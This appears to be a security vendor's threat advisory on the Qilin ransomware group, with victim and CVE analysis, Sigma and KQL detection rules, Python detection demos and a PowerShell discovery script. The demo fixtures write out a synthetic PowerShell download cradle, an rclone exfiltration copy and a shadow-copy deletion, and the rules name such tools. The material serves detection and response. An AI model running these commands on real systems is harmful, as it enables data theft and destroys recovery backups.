
QILIN Ransomware Gang: Aggressive Surge Exploiting SmarterMail & Cisco Firewall CVEs

Security Arsenal Team
May 7, 2026

Aliases: Agenda, Qilin.B (sometimes referred to as Agenda based on code overlaps).

Operational Model: RaaS (Ransomware-as-a-Service). Qilin runs an affiliate program, so the initial access vector varies by affiliate, while the core operators supply a sophisticated Go-based encryption payload that supports intermittent encryption (encrypting only portions of each file) to shorten encryption time and evade detection heuristics that expect full-file rewrites.

Ransom Demands: Variable, typically ranging from $200,000 for mid-market entities to multi-million dollar demands for large enterprise or healthcare targets. They negotiate aggressively.

Initial Access Vectors: Historically known for phishing and exploiting exposed VPN services (FortiGate, SonicWall). However, current intel indicates a heavy pivot toward exploiting public-facing email appliances and management interfaces.

Tactics: Qilin employs double extortion (encryption + data theft). They are known to exfiltrate large volumes of data using tools like Rclone or WinSCP before detonating the encryption payload.

Average Dwell Time: 2–5 days. Recent activity suggests faster "smash-and-grab" operations, particularly when exploiting internet-facing vulnerabilities like CVE-2026-20131.


Current Campaign Analysis

Campaign Timeline: 2026-05-04 to 2026-05-07

Targeted Sectors: The current campaign shows no sectoral discrimination; victims span critical infrastructure and high-value verticals:

  • Manufacturing: 3 Victims (Sylvania DE, Complastex BR, Lexus UA)
  • Financial Services: 2 Victims (Panal Seguros PY, Foxstone Financial AU)
  • Construction: 2 Victims (Asphalt Specialists US, Seagate Capital US)
  • Healthcare & Public Sector: Laclinic-Montreux (CH), Le Maire de QUIBERON (FR)

Geographic Concentration: While global, there is a heavy emphasis on the US (5 victims) and Europe (DE, FR, IT, CH). Latin America (BR, PY) and Asia-Pacific (TH, AU) represent secondary targets.

Victim Profile: Qilin is targeting mid-to-large enterprises. The inclusion of "Le Maire de QUIBERON" (Public Sector) and "Laclinic-Montreux" (Elite Healthcare) suggests they are actively hunting high-value data where the pressure to pay is highest.

CVE Correlation (Initial Access Vectors): The spike in victims correlates in time with the weaponization of recently added CISA KEV vulnerabilities. This is an inference from timing and victim profile (Business Services, Tech), not confirmed forensic attribution; the following CVEs are the most likely primary access vectors:

  1. CVE-2026-20131 (Cisco Secure Firewall Management Center): Allows attackers to bypass authentication and execute code on the firewall management console. This is a "crown jewel" compromise, giving the actor control over the perimeter before internal pivoting.
  2. CVE-2025-52691 & CVE-2026-23760 (SmarterTools SmarterMail): Unrestricted file upload and authentication bypass. Given the targeting of Business Services (e.g., Law Office of Steven R Smith, Inox Market), it is highly probable Qilin affiliates are exploiting these email server flaws to gain a foothold.
  3. CVE-2023-21529 (Microsoft Exchange Server): An Exchange remote code execution flaw that remains a perennial favorite of ransomware actors against unpatched servers, both for initial access and as a springboard for credential theft.

Detection Engineering

The following detection rules are prioritized to catch the specific TTPs observed in this campaign (Email/Perimeter exploitation and PowerShell staging).

YAML
---
title: SmarterMail Unrestricted File Upload Exploit Attempt
description: Detects potential exploitation of CVE-2025-52691 in SmarterTools SmarterMail via multipart POST requests to the mail web-service endpoints. Drop selection_success from the condition to also surface rejected attempts.
references:
  - https://cisa.gov/known-exploited-vulnerabilities-catalog
author: Security Arsenal Research
date: 2026/05/08
status: experimental
logsource:
  category: webserver
detection:
  selection:
    cs-method: 'POST'
    cs-uri-stem|contains:
      - 'Mondo'
      - 'Services/Mail.asmx'
    cs-content-type|contains: 'multipart/form-data'  # only available if your web server or proxy logs the request Content-Type; remove otherwise
  selection_success:
    sc-status: 200
  condition: selection and selection_success
falsepositives:
  - Legitimate administrators uploading attachments via web interface (rare)
level: critical
tags:
  - attack.initial_access
  - attack.t1190
  - cve.2025.52691
---
title: Suspicious Cisco FMC Management Interface Access
id: 8f6a4c2b-1e9d-4a3f-8b7c-9d0e1f2a3b4c
description: Detects potential exploitation of CVE-2026-20131 on Cisco FMC via scripted clients hitting the management paths, or a URL-encoded serialized object in the query string of a POST to those paths.
references:
  - https://cisa.gov/known-exploited-vulnerabilities-catalog
author: Security Arsenal Research
date: 2026/05/08
status: experimental
logsource:
  category: webserver
detection:
  selection_path:
    cs-uri-stem|contains:
      - '/ui/fpmt'
      - '/api/fmc_config/v1/domain'
  indicator_tool_ua:
    cs-user-agent|contains:
      - 'python'
      - 'curl'
      - 'wget'
      - 'metasploit'
  indicator_encoded_brace:
    cs-method: 'POST'
    cs-uri-query|contains: '%7b'  # URL-encoded '{'; a serialized object in the query string is unusual for the FMC UI
  condition: selection_path and 1 of indicator_*
falsepositives:
  - Legitimate API calls from known management workstations (allow-list their source IPs)
level: critical
tags:
  - attack.initial_access
  - attack.t1190
  - cve.2026.20131
---
title: Potential Qilin Ransomware Activity - PowerShell Staging
id: a1b2c3d4-5678-90ab-cdef-1234567890ab
description: Detects behavior consistent with Qilin ransomware pre-encryption staging - PowerShell download cradles that reference staging tools, and shadow copy or backup catalog deletion.
references:
  - https://ransomware.live
author: Security Arsenal Research
date: 2026/05/08
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection_pwsh_download:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'IEX'
      - 'DownloadString'
  selection_staging_tool:
    CommandLine|contains:
      - 'rclone'
      - '7z'
      - 'vssadmin'
  selection_volume_shadow:
    Image|endswith:
      - '\vssadmin.exe'
      - '\wbadmin.exe'
    CommandLine|contains: 'delete'
  condition: (selection_pwsh_download and selection_staging_tool) or selection_volume_shadow
falsepositives:
  - System administration tasks (rare for vssadmin delete)
level: high
tags:
  - attack.execution
  - attack.t1059.001
  - attack.impact
  - attack.t1490
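As an added example (not code from the original advisory or from Security Arsenal), the two web-log rules above expressed as plain Python and run over a handful of constructed W3C-style log lines, so the matching logic can be checked without a SIEM. The endpoint fragments are the ones used in the rules; the sample lines and addresses are synthetic; the internal-network list is an assumption to adjust to your address plan. The encoded-brace indicator is scoped to the FMC paths here to keep noise down, and a successful POST from outside the perimeter is ranked above one from an internal address.

```python
"""Web-log detections from the rules above, run over constructed sample lines."""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass

# Constructed W3C-style lines (synthetic, not captured traffic). Field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
SAMPLE_LOG = """\
2026-05-05 02:14:07 203.0.113.45 POST /Services/Mail.asmx - 200 python-requests/2.31
2026-05-05 02:14:09 10.20.0.8 POST /Services/Mail.asmx - 200 Mozilla/5.0
2026-05-05 03:01:11 198.51.100.7 GET /ui/fpmt/login - 200 Mozilla/5.0
2026-05-05 03:01:15 198.51.100.7 POST /api/fmc_config/v1/domain/default - 401 curl/8.5.0
2026-05-05 03:02:30 198.51.100.7 POST /ui/fpmt/upload payload=%7B%22x%22%3A1%7D 200 Mozilla/5.0
2026-05-05 09:30:00 10.20.0.9 GET /interface/root - 200 Mozilla/5.0
"""

# Endpoint fragments copied from the rules above; verify them against the deployed product build.
SMARTERMAIL_PATHS = ("mondo", "services/mail.asmx")
FMC_PATHS = ("/ui/fpmt", "/api/fmc_config/v1/domain")
TOOL_UA = re.compile(r"python|curl|wget|metasploit", re.IGNORECASE)
# Assumed address plan: RFC 1918 plus loopback count as internal; adjust for your network.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


@dataclass
class WebEvent:
    client_ip: str
    method: str
    uri_stem: str
    uri_query: str
    status: int
    user_agent: str


def parse_w3c(line: str) -> WebEvent | None:
    """Split one log line into fields; return None for comment or malformed lines."""
    parts = line.split()
    if line.startswith("#") or len(parts) != 8:
        return None
    _date, _time, ip, method, stem, query, status, ua = parts
    return WebEvent(ip, method.upper(), stem, "" if query == "-" else query, int(status), ua)


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def smartermail_upload(ev: WebEvent) -> str | None:
    """POST to the SmarterMail upload endpoints. Success (200) from outside the
    perimeter is the critical case; a rejected attempt is still worth a look."""
    if ev.method != "POST" or not any(p in ev.uri_stem.lower() for p in SMARTERMAIL_PATHS):
        return None
    if ev.status != 200:
        return "medium"
    return "critical" if is_external(ev.client_ip) else "high"


def fmc_access(ev: WebEvent) -> str | None:
    """Scripted client on an FMC management path, or a URL-encoded '{' in a POST
    query string to one of those paths (the %7b indicator from the rule above)."""
    if not any(ev.uri_stem.lower().startswith(p) for p in FMC_PATHS):
        return None
    if TOOL_UA.search(ev.user_agent):
        return "critical"
    if ev.method == "POST" and "%7b" in ev.uri_query.lower():
        return "high"
    return None


RULES = (("smartermail_upload", smartermail_upload), ("fmc_access", fmc_access))


def detect(log_text: str) -> list[tuple[int, str, str]]:
    """Return (line number, rule name, severity) for every line a rule matches."""
    alerts = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        ev = parse_w3c(line)
        if ev is None:
            continue
        for name, rule in RULES:
            sev = rule(ev)
            if sev:
                alerts.append((lineno, name, sev))
    return alerts


if __name__ == "__main__":
    for lineno, name, sev in detect(SAMPLE_LOG):
        print(f"line {lineno}: {name} [{sev}]")
```

Running it flags lines 1 and 2 (SmarterMail POSTs, the external one as critical), line 4 (curl against the FMC API) and line 5 (encoded brace in a POST to an FMC path); the GET to the FMC login page from a browser and the ordinary SmarterMail interface hit stay quiet.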


**KQL (Microsoft Sentinel) - Lateral Movement & Staging Hunt**
This query surfaces process launches often associated with Qilin affiliates' use of Cobalt Strike and hands-on-keyboard lateral movement.

kql
let TimeRange = 1d;
DeviceProcessEvents
| where Timestamp > ago(TimeRange)
// Tools seen with Qilin affiliates. DeviceProcessEvents exposes the image name as FileName (there is no ProcessName column).
// Real beacons are rarely named cobaltstrike.exe/beacon.exe; the command-line filter below carries most of the weight.
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "rclone.exe", "cobaltstrike.exe", "beacon.exe")
// Encoded or hidden-window invocations and in-memory download cradles (has_any, not "has any")
| where ProcessCommandLine has_any ("-enc", "-encodedcommand", "-w hidden", "-nop", "bypass", "DownloadString")
// Parent context matters: a web or mail server worker spawning these is the strongest signal. Join DeviceNetworkEvents on
// DeviceId/InitiatingProcessId to add the outbound connection if you need the destination.
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc
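As an added example (not part of the original advisory), the staging checks from the PowerShell rule and the KQL hunt above applied to a few constructed process-creation events, with one addition the raw keyword match cannot do on its own: the `-EncodedCommand` argument is base64 over UTF-16LE, so `DownloadString` or `rclone` inside it is invisible to a substring search until it is decoded. The sample events, the web-server parent list and the severity ranking are assumptions for illustration; field names follow the DeviceProcessEvents schema used by the KQL above.

```python
"""Process-creation staging checks from the rules above, with -EncodedCommand decoding."""
from __future__ import annotations

import base64
import re


def encode_for_powershell(script: str) -> str:
    """Encode a script the way `powershell -EncodedCommand` expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed events (synthetic). Field names follow DeviceProcessEvents.
SAMPLE_EVENTS = [
    {"FileName": "powershell.exe", "InitiatingProcessFileName": "w3wp.exe",
     "ProcessCommandLine": "powershell.exe -nop -w hidden -enc " + encode_for_powershell(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.45/r.ps1'); Start-Process rclone.exe")},
    {"FileName": "vssadmin.exe", "InitiatingProcessFileName": "cmd.exe",
     "ProcessCommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"FileName": "powershell.exe", "InitiatingProcessFileName": "explorer.exe",
     "ProcessCommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"FileName": "rclone.exe", "InitiatingProcessFileName": "cmd.exe",
     "ProcessCommandLine": "rclone.exe copy D:\\Finance remote:drop --transfers 32"},
]

# -e, -ec, -enc, -encoded and -encodedcommand are all accepted prefixes of -EncodedCommand
ENC_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
DOWNLOAD_WORDS = ("invoke-webrequest", "iex", "downloadstring", "downloadfile")
STAGING_TOOLS = ("rclone", "7z", "winscp")
WEB_PARENTS = ("w3wp.exe",)  # IIS worker; add your mail server's own service binary if it is not IIS-hosted


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the decoded -EncodedCommand payload, or None if absent or not valid base64/UTF-16LE."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def effective_command_line(cmdline: str) -> str:
    """The command line plus whatever the encoded argument expands to, for keyword matching."""
    decoded = decode_encoded_command(cmdline)
    return f"{cmdline} {decoded}" if decoded else cmdline


def classify(ev: dict) -> list[str]:
    """Tags mirroring the Sigma selections above, evaluated on the decoded command line."""
    name = ev["FileName"].lower()
    parent = ev["InitiatingProcessFileName"].lower()
    cmd = effective_command_line(ev["ProcessCommandLine"]).lower()
    tags: list[str] = []
    if name in ("powershell.exe", "pwsh.exe"):
        if decode_encoded_command(ev["ProcessCommandLine"]) is not None:
            tags.append("encoded_command")
        if any(w in cmd for w in DOWNLOAD_WORDS):
            tags.append("powershell_download")
        if any(t in cmd for t in STAGING_TOOLS):
            tags.append("staging_tool_reference")
        if parent in WEB_PARENTS:
            tags.append("spawned_by_web_server")
    if name in ("vssadmin.exe", "wbadmin.exe") and "delete" in cmd:
        tags.append("shadow_copy_delete")
    if name == "rclone.exe":
        tags.append("rclone_execution")
    return tags


def severity(tags: list[str]) -> str | None:
    """Assumed ranking: recovery inhibition and web-server-spawned shells first."""
    if "shadow_copy_delete" in tags or "spawned_by_web_server" in tags:
        return "critical"
    if "powershell_download" in tags or "rclone_execution" in tags:
        return "high"
    return "medium" if tags else None


def triage(events: list[dict]) -> list[tuple[int, str, list[str]]]:
    """(index, severity, tags) for every event that hits at least one check."""
    out = []
    for i, ev in enumerate(events):
        tags = classify(ev)
        sev = severity(tags)
        if sev:
            out.append((i, sev, tags))
    return out


if __name__ == "__main__":
    for i, sev, tags in triage(SAMPLE_EVENTS):
        print(f"event {i}: {sev} {tags}")
```

The encoded cradle spawned by w3wp.exe and the shadow copy deletion come out critical, the bare rclone copy comes out high, and the administrator's signed-off backup script with `-ExecutionPolicy Bypass` produces nothing, which is the point of matching on the decoded content rather than on "bypass" alone.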


**PowerShell - Rapid Response Hardening & Discovery Script**
Run this from an elevated session on critical servers and workstations to identify pre-encryption artifacts. The process-creation check needs "Audit Process Creation" with command-line logging enabled (or use Sysmon Event ID 1 instead).

powershell
# Qilin Ransomware Rapid Response Script (run elevated)
Write-Host "[*] Checking for scheduled tasks created in the last 24h (potential Qilin persistence)..." -ForegroundColor Yellow
# Date is stored as a string in the task XML and is often empty; cast before comparing
Get-ScheduledTask | Where-Object { $_.Date -and ([datetime]$_.Date) -gt (Get-Date).AddDays(-1) } |
    Select-Object TaskName, Date, Author, State

Write-Host "[*] Checking for shadow copy / backup catalog deletions (Security 4688 process creation)..." -ForegroundColor Yellow
# 4663 is object access; process launches are 4688 and carry the command line only if command-line auditing is on
$Events = Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688; StartTime=(Get-Date).AddHours(-24)} -ErrorAction SilentlyContinue
$Events | Where-Object {
    ($_.Message -match 'vssadmin'   -and $_.Message -match 'delete') -or
    ($_.Message -match 'wbadmin'    -and $_.Message -match 'delete') -or
    ($_.Message -match 'shadowcopy' -and $_.Message -match 'delete')
} | Select-Object TimeCreated, Id, Message

Write-Host "[*] Checking for active RDP sessions..." -ForegroundColor Yellow
# Lists console and rdp-tcp#N sessions; review any remote session from an unexpected account
query session 2>$null

Write-Host "[*] Scanning for ransom notes, encrypted files and staged rclone configuration..." -ForegroundColor Yellow
$paths = @("C:\", "D:\", "E:\")
# Patterns from this advisory plus the README-RECOVER-<ext>.txt note Qilin/Agenda builds drop; the file
# extension is chosen per victim, so add the one you observe on the first encrypted host
$patterns = @("*.enc_qilin", "*.README", "*.qilin", "README-RECOVER-*.txt", "rclone.conf")
foreach ($p in $paths) {
    if (Test-Path $p) {
        # -Include accepts several patterns when combined with -Recurse; -Filter takes only one
        Get-ChildItem -Path $p -Include $patterns -Recurse -File -ErrorAction SilentlyContinue |
            Select-Object FullName, CreationTime
    }
}


---

Incident Response Priorities

T-Minus Detection Checklist (Pre-Encryption):

  1. Email Logs: Immediate review of SmarterMail/Exchange logs for POST anomalies from external IPs.
  2. Perimeter Alerts: Review firewall logs specifically for Cisco FMC management interface access logs. Any external IP accessing the FMC web UI is a critical indicator of compromise (CISA KEV CVE-2026-20131).
  3. Process Anomalies: Hunt for PowerShell processes spawned by IIS worker processes (w3wp.exe) or with specific encoded arguments.

Critical Assets Prioritized for Exfiltration:

  • Employee PII/HR Databases (High leverage for blackmail).
  • Financial Reconciliation Files (Access to bank accounts).
  • Client Lists / Source Code (IP Theft).

Containment Actions (Order of Urgency):

  1. Segregate Network: Immediately isolate the management network (where FMC lives) and the mail server segment from the production LAN.
  2. Disable VPN/RDP: If RDP is required, enforce MFA and require bastion host access; otherwise, disable internet-facing RDP.
  3. Credential Reset: Force reset of domain admin credentials and service accounts if email servers are compromised.

Hardening Recommendations

Immediate (24 Hours):

  • Patch Critical CVEs: Apply patches for Cisco FMC (CVE-2026-20131) and SmarterMail (CVE-2025-52691) immediately. These are active exploit pathways.
  • Block Internet Access to Management Interfaces: Ensure FMC, vCenter, and Exchange admin panels are not accessible from the internet without strict VPN access and IP allow-listing.
  • Disable Legacy and Remote-Access Services: Temporarily disable SMBv1 and RDP on critical servers if not strictly required.

Short-term (2 Weeks):

  • Implement deception (Honeypots): Deploy fake admin credentials and "canary" SMB shares. Qilin actors often move laterally using valid credentials; detecting a canary trigger provides early warning.
  • Network Segmentation: Enforce strict Zero Trust segmentation between Email gateways and the internal domain controllers.
  • EDR Tuning: Update EDR policies to detect tools like Rclone and Mimikatz regardless of how they are launched, including from PowerShell (enable script block logging so the executed content is visible to the sensor).
